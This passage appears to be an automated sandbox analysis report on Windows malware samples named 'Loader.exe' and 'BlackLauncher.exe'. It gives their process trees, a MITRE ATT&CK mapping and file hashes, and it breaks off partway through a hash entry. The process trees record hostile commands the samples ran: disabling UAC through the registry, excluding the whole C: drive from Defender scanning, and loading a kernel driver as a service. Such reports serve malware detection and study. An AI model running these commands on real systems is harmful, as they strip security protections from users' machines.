- C:\Users\Admin\Downloads\Loader.exe
  "C:\Users\Admin\Downloads\Loader.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Drops file in System32 directory
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID:4744
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc stop iqvw64e.sys
    3⤵
    PID:5492
  - - C:\Windows\system32\sc.exe
      sc stop iqvw64e.sys
      4⤵
      Launches sc.exe
      PID:5988
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc delete iqvw64e.sys
    3⤵
    PID:5776
  - - C:\Windows\system32\sc.exe
      sc delete iqvw64e.sys
      4⤵
      Launches sc.exe
      PID:5968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc create windowsproc type=kernel binpath=C:\Windows\System32\drivers\winhb.sys
    3⤵
    PID:6364
  - - C:\Windows\system32\sc.exe
      sc create windowsproc type=kernel binpath=C:\Windows\System32\drivers\winhb.sys
      4⤵
      Launches sc.exe
      PID:6400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3092
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc start windowsproc
    3⤵
    PID:6460
  - - C:\Windows\system32\sc.exe
      sc start windowsproc
      4⤵
      Launches sc.exe
      PID:1800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6088
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C sc delete windowsproc
    3⤵
    PID:5912
  - - C:\Windows\system32\sc.exe
      sc delete windowsproc
      4⤵
      Launches sc.exe
      PID:6728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:1
  2⤵
  PID:6736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
  2⤵
  PID:1476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1
  2⤵
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7432 /prefetch:1
  2⤵
  PID:7132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1
  2⤵
  PID:828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5564 /prefetch:8
  2⤵
  PID:904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1964,5358894407172015614,5375289401509325693,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6900 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:4660
- C:\Users\Admin\Downloads\Loader (1).exe
  "C:\Users\Admin\Downloads\Loader (1).exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:6972
- - C:\Users\Admin\Downloads\Loader.exe
    "C:\Users\Admin\Downloads\Loader.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:776
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C Powercfg -h off
      4⤵
      Power Settings
      PID:2208
    - - C:\Windows\system32\powercfg.exe
        
        Powercfg -h off
        5⤵
        Power Settings
        
        PID:6292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell "Confirm-SecureBootUEFI" > C:\secureboot_status.txt
      4⤵
      PID:5160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "Confirm-SecureBootUEFI"
        5⤵
        
        PID:5968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      PID:5104
    - - C:\Windows\System32\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:4320
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C sc create windowsproc type=kernel binpath=C:\Windows\System32\drivers\winhb.sys
      4⤵
      PID:4500
    - - C:\Windows\system32\sc.exe
        
        sc create windowsproc type=kernel binpath=C:\Windows\System32\drivers\winhb.sys
        5⤵
        Launches sc.exe
        
        PID:584
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C sc start windowsproc
      4⤵
      PID:6540
    - - C:\Windows\system32\sc.exe
        
        sc start windowsproc
        5⤵
        Launches sc.exe
        
        PID:5700

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3776

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4840

C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe
"C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2100
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/Downloads/nb3ce1n9msom/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1092
- - C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe
    "C:\Users\Admin\Downloads\nb3ce1n9msom\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:5116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1124

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5948

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6492

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

Filesize
64KB

MD5
b5ad5caaaee00cb8cf445427975ae66c

SHA1
dcde6527290a326e048f9c3a85280d3fa71e1e22

SHA256
b6409b9d55ce242ff022f7a2d86ae8eff873daabf3a0506031712b8baa6197b8

SHA512
92f7fbbcbbea769b1af6dd7e75577be3eb8bb4a4a6f8a9288d6da4014e1ea309ee649a7b089be09ba27866e175ab6f6a912413256d7e13eaf60f6f30e492ce7f

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\D3DSCache\cb00da9ba77862e\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

Filesize
1008B

MD5
d222b77a61527f2c177b0869e7babc24

SHA1
3f23acb984307a4aeba41ebbb70439c97ad1f268

SHA256
80dc3ffa698e4ff2e916f97983b5eae79470203e91cb684c5ccd4ff1a465d747

SHA512
d17d836ea77aeaff4cd01f9c7523345167a4a6bc62528aac74acde12679f48079d75d159e9cea2e614da50e83c2dcd92c374c899ea6c4fe8e5513d9bf06c01ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
210KB

MD5
5ac828ee8e3812a5b225161caf6c61da

SHA1
86e65f22356c55c21147ce97903f5dbdf363649f

SHA256
b70465f707e42b41529b4e6d592f136d9eb307c39d040d147ad3c42842b723e7

SHA512
87472912277ae0201c2a41edc228720809b8a94599c54b06a9c509ff3b4a616fcdd10484b679fa0d436e472a8fc062f4b9cf7f4fa274dde6d10f77d378c06aa6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0b65126d56d11b10_0

Filesize
370KB

MD5
112947600a27d4c54edb1fbe8f29027c

SHA1
5921b0d598feb97c51f1ad2c500e425b1e113555

SHA256
403e91b69ee221809218af4429bf7379de15940f939100632b9720c8e00f6059

SHA512
15c45aaa38bf09107ac2aabac08368f58b72c66c929703cacb92530be9f324cbbfe36bafdf449940035e98b2299229555b6e25706340a51e83e3e671f9c4fb7c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\765d04edb0a6b4d5_0

Filesize
280B

MD5
dab39a360f603dbee618669a27f6c74e

SHA1
d94117882f5d217b6e0545e7f67025dce1234355

SHA256
a9b8b1c5401eb9f4a243f2fd1236deea62e4048ded21e293eee652c5df8a6202

SHA512
598004e4fa66450207b4e3a9ee80db2054a77a3c83f5aec4e3b4e9667657798cd072f7a875c7d536c61c515c867d66e28625df18bde4319b2fadf7d1cafbbf32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\a193003868b1b50c_0

Filesize
19KB

MD5
b809ec5bbfae2a501404c9701768e81e

SHA1
0ea2d9b1489f044acf446215b27f7f4ffd7bc799

SHA256
2dd524430acd5850ab708e02a235d8c04557fbb6dc5e05b0883af60750065b7b

SHA512
ca3007d761be200f27ad612e0bfb61c6e7f6a79d4a46f6e3f6ce8a3159b5c2cf972e65309e50d1c84c9f5913c4e1463d1e269fad7cc8dd601e3b3788c61eddbc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fd161cdb009ae2f3_0

Filesize
289B

MD5
e4d7ae3053a992b69495faafa0622586

SHA1
bdf4508d52832a98c5b6f08e74ae8469a3e30de3

SHA256
a0b6da7f9790e3df86c35ef74a71514bf9afde3914d7ef29f58a7d0d29e7cd40

SHA512
4afea1244c5993c405da61f4c01d7877645173814ffc50e145c32cb3296799a8793b891a3db1706a28cd582283a625402105708bb792c0b1eeac35cf348d5107

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
637da90af19d26948836aacab2100605

SHA1
b9dfb7997dfde13f8cd50474f469789e6434700d

SHA256
438787a8076b57b68582fc7726fe0a54e0e7c90c0e0c63580a0a7e11360e3786

SHA512
d1cc3f64a210f4aef5a383304e602fe404e2214501b77f17abf7d48121fbb9edc463a590a77ead174697d824d9e375c559a3a4f75a561eed8bcffd94e8dda934

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
37a6e3467537947740747b6f36d57126

SHA1
197630e76ebfa13508dc6e4e8306de8140829f8a

SHA256
2d7eadf428b966528821483f19cf333c12544ab5ffaa1daa4e93df455bed6a31

SHA512
c2327572fd67f7b993a405101f19a221d6273896375bb1e34eff4978ffdf0b34218eb6b6e0e8d5b3df2587b79a8f0061ec9d0ec8d7aa1c170e194a63d10d088d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
0275b839c13ec8f0c69f9497aab6394d

SHA1
806d867e9d165013b619021846f94d1a7041f142

SHA256
18f995b5a0a6e2e535d1d5cb6bcceed0bc598933ec3989569772ec9854551a2e

SHA512
0a9de4cf52472e39383e769168a829181e1a0381b07c22533bc99a305e60a64db355a9edcbc5291f41b638053cd1f4d88657fa6e61a9992f6b7d02d3271d1522

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
7f6d66796486b1dbe984274420903884

SHA1
a6ea1df7bb545d26f3fb87777157332ed46a47c2

SHA256
fbd274e53816fdfffa885ea2509259d727e5ab3408fe63577cc3a38cc2792bde

SHA512
0d0c8d13fa3dd1f9f2a523126d8820391041e44dabc36077dd51b5a1b92c46507a626d1fbcc4b15be26ec854e35d887225ca963d2bcc0405647d3c1b1505bffe

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
00aae3341f5a423091eb738cec9bb7dd

SHA1
19fc89a1ff83ef94eb5dc31bf21cc8dbb5c82b00

SHA256
2011ecd1edc6b2c9545a5b7dc0a454f70c60c1a075fb7f3d61abfc3a170bd926

SHA512
abb8b8a4151f4949c5eac0cf33f82cea92d7b084f5a30b5a009869ad48bdbe98d4508865f1bbaf3b071a3da03498c5ef4df3cb44894eb3d066455be73237ee15

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
4e8332f02dcfbda3d5174994815bb01d

SHA1
26c1f7dea9d706759d0245660ce1112725e6722b

SHA256
d5ac2d51c2fe84068a8cebb14bb5e21816f492c523adc73caafeb3257a1053a0

SHA512
19bb71d5272d6b1b3d39343bc35ac368237768d79f6cb79fa695e10ae7b043be70c8d57d81b2ee78385383f742b0c6981714bce52be54c4b93c3ee04114a9f0f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
d86076254ef5bcbb5940af8665d9f0c0

SHA1
f8c4ab19e01af6bc380ac9cda3309cf33a5dc5bb

SHA256
fa7a166adbacfd66bd09bdbab3d177cd91a6ad16f49564c378f0b775cc7ee98e

SHA512
ef047f33c94e153682cc17bb0684b7bbfb3a27c123a6f9a2ae839fb1e7393ea01a7726f38f1d8ee6e007f1b3ecdf43463134fdad73500fc23c6ba43bfb3d5d2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
00b73fe0ae08d8b3afb816c885c2def1

SHA1
ae470abd4a9fc8f1c885e99d3ff41e9992219de9

SHA256
f8074b4f8e0154cc7040e063bb6d2bd599952012f002fb65014c1874fcc51ee6

SHA512
a56586859e82143d902a879cccea2c1e90b4f634adea8b4bae7b0b3a0388ff24fb01b8df9b2ec5ad810c5aa54fdacb0f27bddef1f3b5220dcba654932526ee87

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
3aa8966f1affc4f787dc072653080ac0

SHA1
95d27e2cee0def9e756f37210dfa3a927ad5a5db

SHA256
ea6f8f32856a2f48c1aa788f44675cd56097715cfad305fe56822cd992adeca2

SHA512
67c4fc4a9d31726e6d970c76244bbe9113a340ccc749cbaa9563064ae4e8b8b8c2564b5b45e4ed34ec34454f8e75773590f49ade3d6a60c9792d7f43bcd4696a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
bca7e575796fcf7ec53f0b3542ab5f66

SHA1
d54511aa26db8065d2150d61c8708337da2d29ad

SHA256
37786f5abb749690144fd0c93d58647af3d74af2dcbe43aa347a6aa4ba7a3873

SHA512
bc1c9f7169dafce522ab8352d3060110360a95df748a68612e0a891215bcea61d0e358d55c4cb6b2c3b7d3162846e57413901593087d113a151cb8b558f577cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
992b801781107b0113c0bffd587e4cb3

SHA1
3cf73e9c78e70b908740f13da9e0e561628ad734

SHA256
bd25f59b053278e6b3ee58306505548ae82d249d61a8a6b356b400f2a581b09f

SHA512
5100359369085221d81297a2c009e3697beea40d3c8011e9f52c78c9860c924a03b9d9ee0a055d282a86babb3b170179eedc657a7b277afe2238045658c522b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
552c5d6e6b8b6a16e651fd960c9c9bd8

SHA1
3d2b8df0821128a53617c3e55105d40f5b4ded6a

SHA256
b78d962cc9bb40cca13aaaabd6236a0fe1566a582ff71cbc8927a691a531ae94

SHA512
129931ae283da1275c7407791175f944adaab855c1eff2926c11bd07f8aacff4f2947de90bcd41dc577e682c9b19f5115a12567340a75916dfef1911d4026722

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
fec74deb3ff92107ff1bbfecc5621014

SHA1
d68b8514b6376ffb5e22df6e9728372ff85f0bea

SHA256
d651e3ee7f77af8cf36628f455a2e731e07a8e4f5494a4fcc168f5e1f7b38660

SHA512
89f518c33b6dc7aa4538d86c4b671c734f6b8248ebe5121a33e64735e700fe39e9dacd70a6e17d3b5e3cac43db3f98624a23f86f85d69c94683132cadd7fbd06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
37d1631ea68bf5bfb72b4834bf80eda7

SHA1
4584e0ba084e06c7c708140f64144a8ba527e17c

SHA256
7d173de49f43e0630bc39cda9511cd668be4644fe370dc5a33b1f8291ddd06e0

SHA512
b42bf890c461e647a387c77a6797720c1706422856ea06b729552dae13b93e5233a4e7ed90736f80142fde8ef11b445c3d3f8f244e193aab387b22c29cdc3533

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
1da3439d35f10e92b2a4ec71a55beed6

SHA1
9f0a83f76ba7b757df2ebeed161459c43f215825

SHA256
04a894a0f33f223b13777865bdddbfa8a5ce3ba52cf501af6be4d43bbe3cbf78

SHA512
590f1e7d8b63fd387b56b4257e59d0b98fa3b0f495ea06c81402de7e9ad86bac7fa859b25c04fd6f7d2e2371fba38608faf6b4bd0dccb54be95f48ca2cccf475

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9eb597e4ac861651dbcfa85b4844b297

SHA1
55d1bd0b8be974f2c5c136bde2a4a12333e3b4ae

SHA256
ba0aa9890dfa955db92527535d3bd644309d5cbc5cb454730d88108dcff42e1e

SHA512
6e32fa48b026c7829e3c444e648d380fd9245706fa512ce163d2ca128a9b67fda4190a286d9b0e0ce4813332bd130c92d465f623eea5fd649c20dce8f1177246

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
ffc26883868d79434e85b85429c74026

SHA1
13eaf883358c9ce0b2db832be6392ea428beb0c8

SHA256
a9e024b65667fd6d0198c87482270a7a01426db94c36319dd6ccab54d43f0e3a

SHA512
60be506c136e6b2d85986189c6745baf27d7858bf69e7345b8cfad2ff444b1557205d042bb5a104ade028223e1f6d5763ff30e0e5bb02b2534608eaa40a653d1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
5adaabd815661329292856133f2dedeb

SHA1
f8328e3993a35331614bb8c08b92b40d2fd3c896

SHA256
9595dd647cb90ab2d56923ad8869d80567818c50d2ee87f86093d2fe4da25306

SHA512
b040345632baffeba7313eeb8571844e99d8de49e4b18870bf53259f6555e01fa63f464f1534c15b458e6f5bcda73ed25aa00ff443a936e5f2b55f2019b7cf7d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
290b512ba1c9fe8af1d89f1e9bb9b726

SHA1
5184183949b6232d54511ce284b9d25242f86059

SHA256
010082d646b5f515c822eecd551670318637743835e3f97265e2cf1b72898711

SHA512
ca02afc50db9b7e18f109d76a5aaae0dc2034b28831ac2640c31c8632e2f839051f56febe8ff7f42463134932a9539612e8000c8311d551b078f1fa16703bfda

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
fbe281e988166b85f1526abcbc3bf198

SHA1
060b654d7c76f7b5a434e0c0d0747ea2a118748c

SHA256
9ac327f1dc87c9ded95f5e282493d998b663bdfc34ce79c6780311d9271bed67

SHA512
646c69909a3ffea24e904a313602d3614fe69761a039b9dfcf202598a01910509739d65fa1ebe51b639e820003fcc601f4bef9007f755f7d0585bbfe5a93ccb7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
100KB

MD5
215df7081eb494a287484cff52dc7229

SHA1
1d75205ef0250088e8f8311121e01cb547a78a29

SHA256
b2fb6cacbaf0b00b50cf3d15f819ef56cee2252c6ad6fcaeb3b75692c87e913a

SHA512
31d8d126608bd7ae8cc543015b43685d7cc8fe30d3d8e356c4c791bd9b59d0a459d22a977c50d65844994713f9225124c6c19c741601b3ca18f5d6874ec8370d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
100KB

MD5
39e8575fcd4f88b96ad40cebe2fcddf7

SHA1
fd3a845455b27d7c70f3084a1782d7067bf2f6db

SHA256
c6416a1684675ac01595b6999da0601b6d154acae8c8c689ea120bdfb00fe5c0

SHA512
bb9436168ac971d49cf7abd4e41b691ca6173cef1bb6cd3f7b12a3fdc5778f9462876adb38c3cff884b072f0fc67a38d82c0afcd3736abda89f65e36cb9713a6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
100KB

MD5
f5ee8b38bb306faadb6184bfbcbb4675

SHA1
0a759115ddff8c3880d30d68eb045e80a9f6c57c

SHA256
0833c7b1a4ce8289d75a7a4b7c20c180cae3a8d339d0dc0d4c173746211eb7ca

SHA512
95e04f27d9388b5bd946849011d45f19462820b5a010a5f8a9ee6c6ade0b47269dac58f1d2eac14eba7a7a23762c09140b0f5f3c4c1b6b822ef6aff0b83f191e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
100KB

MD5
9914de057b164a39109da47a48356cec

SHA1
db3e2c830195f6fca796e870cb7a7e125a034954

SHA256
b68bfaa2481077817de1ec98f97a5916662f6ced7df7ba9ad706ed931bad0e76

SHA512
32efc519a87bcfbd5b49ab0e827d271010d3787337bc5fb1d49c9de3dfaf8b5858c3948365ddb8a0ece329e5037b59935fbff64dac199ce3745239a005e36e1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
03fa37bce344b540670afadd7aecdb10

SHA1
ce316b46515e080f067f50ab9bf778f54164d02b

SHA256
488297285ab50a5a543033b673afdc5673dbbf58cc357fbe986b564e104e2c82

SHA512
1be5df4fc7304ba20ff452f875176d6874b6cd1c4f13ab4bcab274f59435bc9ac1a42afa24d419c09e304e612f3b90f4439d8b2e31c904fd63553ebc9cfad77b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
88a9806e3f28216349c268c930f349e5

SHA1
891d1f50ad99cbdef41509f5523bf9a218e5d70e

SHA256
8cca9dad76139782c28ace54b5ec58883421a30c0110fe66953bcbc2e8eb179a

SHA512
